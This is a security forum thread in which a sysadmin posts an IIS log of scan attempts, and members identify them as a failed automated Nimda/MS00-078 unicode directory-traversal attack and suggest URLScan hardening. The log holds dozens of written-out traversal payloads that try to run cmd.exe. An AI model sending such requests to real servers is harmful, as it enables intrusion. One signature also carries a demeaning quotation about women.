IIS Log - Is somebody trying to Hack my website
Results 1 to 8 of 8

Thread: IIS Log - Is somebody trying to Hack my website

  1. #1
    Junior Member
    Join Date
    Dec 2005
    Posts
    2

    IIS Log - Is somebody trying to Hack my website

    Hi,

    I am Sys Admin for a web site. I was going thru the IIS LOgs and found the following entries in the Logs files

    2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:27:51 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:27:56 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:03 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:04 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:12 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:26 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:27 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:29 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:13 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:29:38 80.117.251.32 - 10.100.1.125 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:55 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:57 80.117.251.32 - 10.100.1.125 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:19 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:44 80.117.251.32 - 10.100.1.125 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:46 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:35 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:45 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:56 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:15 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:18 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:33:43 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:33:44 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:34:09 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:11 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:42 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:47 80.117.251.32 - 10.100.1.125 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:34:48 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:12 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:16 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:41 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:43 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
    2005-11-28 01:36:28 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:31 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:35 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:47 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:48 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:59 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:37:24 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:37:26 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:38:52 80.117.251.32 - 10.100.1.125 80
    HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 403 -


    I think somebody is trying to hack into the system. Need help.

    Regards,

    Vishwas

  2. #2
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    No worry... Automated tool... the result codes indicate it failed.....

    Relax and crack as cold one....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  3. #3
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    I think Tiger is right...

    For your information.. the tool is trying to abuse MS00-078...
    It uses the same vulnerabilities as the Nimda worm..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  4. #4
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Here's where the attack likely came from:

    inetnum: 80.117.0.0 - 80.117.255.255
    netname: TINIT-ADSL-LITE
    descr: Telecom Italia S.p.A. TIN EASY LITE
    country: IT
    admin-c: BS104-RIPE
    tech-c: BS104-RIPE
    status: ASSIGNED PA
    remarks: ##########################################
    remarks: Pay attention
    remarks: Any communication sent to email different
    remarks: from the following will be ignored!
    remarks: Any abuse reports, please send them to
    remarks: abuse@retail.telecomitalia.it
    remarks: ##########################################
    mnt-by: TIWS-MNT
    source: RIPE # Filtered

    person: BBBEASYIP STAFF
    address:
    address: Via Val Cannuta, 250
    address: I-00100 Roma
    address: Italy
    phone: +39 06 36881
    e-mail: ripe-staff@telecomitalia.it
    nic-hdl: BS104-RIPE
    source: RIPE # Filtered

    % Information related to '80.117.0.0/16AS3269'

    route: 80.117.0.0/16
    descr: INTERBUSINESS
    origin: AS3269
    mnt-by: INTERB-MNT
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  5. #5
    Junior Member
    Join Date
    Dec 2005
    Posts
    2
    thnks a lot buddy..now i can sleep peacefully.....

  6. #6
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    779
    IIS Log - Is somebody trying to Hack my website
    Yes. Some attacker with his "fancy" scanner

    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    That is what it looks like to me.

  7. #7
    Banned
    Join Date
    Apr 2003
    Posts
    1,147
    Yeah, the Italian is walking through a sequence of attempts to use the nimda backdoor to your IIS. Based on the speed of the hits, I guess the kiddie is using a script. If you've run the URLScan tool, you should be rejecting these safely. If not, you might want to take a look at your IIS hardening, just to be sure.

  8. #8
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    the unicode directory transversal...it's really sad but he'll probably find a few vulnerable servers.
    Bukhari:V3B48N826 The Prophet said, Isnt the witness of a woman equal to half of that of a man? The women said, Yes. He said, This is because of the deficiency of a womans mind.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •